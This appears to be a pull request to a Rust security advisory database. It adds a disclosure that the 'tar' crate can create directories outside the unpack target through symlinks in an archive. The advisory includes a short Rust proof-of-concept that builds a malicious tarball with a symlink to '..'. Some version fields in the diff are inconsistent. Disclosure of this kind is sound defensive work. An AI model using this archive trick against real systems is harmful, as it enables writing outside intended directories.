### PR TITLE
Add directory traversal for tar

### DIFF
--- a/crates/tar/RUSTSEC-0000-0000.md
+++ b/crates/tar/RUSTSEC-0000-0000.md
@@ -4,7 +4,6 @@ id = "RUSTSEC-0000-0000"
 package = "tar"
 date = "2021-07-19"
 url = "https://github.com/alexcrichton/tar-rs/issues/238"
-categories = ["directory-traversal"]
 
 [versions]
 # none, 0day

--- a/crates/tar/RUSTSEC-0000-0000.md
+++ b/crates/tar/RUSTSEC-0000-0000.md
@@ -1,0 +1,58 @@
+```toml
+[advisory]
+id = "RUSTSEC-0000-0000"
+package = "tar"
+date = "2021-07-19"
+url = "https://github.com/alexcrichton/tar-rs/issues/238"
+categories = ["directory-traversal"]
+
+[versions]
+# none, 0day
+#patched = ["> 0.4.35"]
+
+[affected]
+functions = { "tar::Archive::unpack" = ["< 1.2.3"] }
+```
+
+# Links in archive can create arbitrary directories
+
+When unpacking a tarball that contains a symlink the `tar` crate may create
+directories outside of the directory it's supposed to unpack into.
+
+The function errors when it's trying to create a file, but the folders are
+already created at this point.
+
+```rust
+use std::{io, io::Result};
+use tar::{Archive, Builder, EntryType, Header};
+
+fn main() -> Result<()> {
+    let mut buf = Vec::new();
+
+    {
+        let mut builder = Builder::new(&mut buf);
+
+        // symlink: parent -> ..
+        let mut header = Header::new_gnu();
+        header.set_path("symlink")?;
+        header.set_link_name("..")?;
+        header.set_entry_type(EntryType::Symlink);
+        header.set_size(0);
+        header.set_cksum();
+        builder.append(&header, io::empty())?;
+
+        // file: symlink/exploit/foo/bar
+        let mut header = Header::new_gnu();
+        header.set_path("symlink/exploit/foo/bar")?;
+        header.set_size(0);
+        header.set_cksum();
+        builder.append(&header, io::empty())?;
+
+        builder.finish()?;
+    };
+
+    Archive::new(&*buf).unpack("demo")
+}
+```
+
+This issue was discovered and reported by Martin Michaelis (@mgjm).

--- a/crates/tar/RUSTSEC-0000-0000.md
+++ b/crates/tar/RUSTSEC-0000-0000.md
@@ -8,7 +8,7 @@ categories = ["directory-traversal"]
 
 [versions]
 # none, 0day
-#patched = ["> 0.4.35"]
+patched = []
 
 [affected]
 functions = { "tar::Archive::unpack" = ["< 1.2.3"] }


### PR DESCRIPTION
Original report at https://github.com/alexcrichton/tar-rs/issues/238, discovered and reported by @mgjm.

Even though the report is from 2020 it still has 0day status, there's currently no patch. The stale issue was shared with me by @stoeckmann.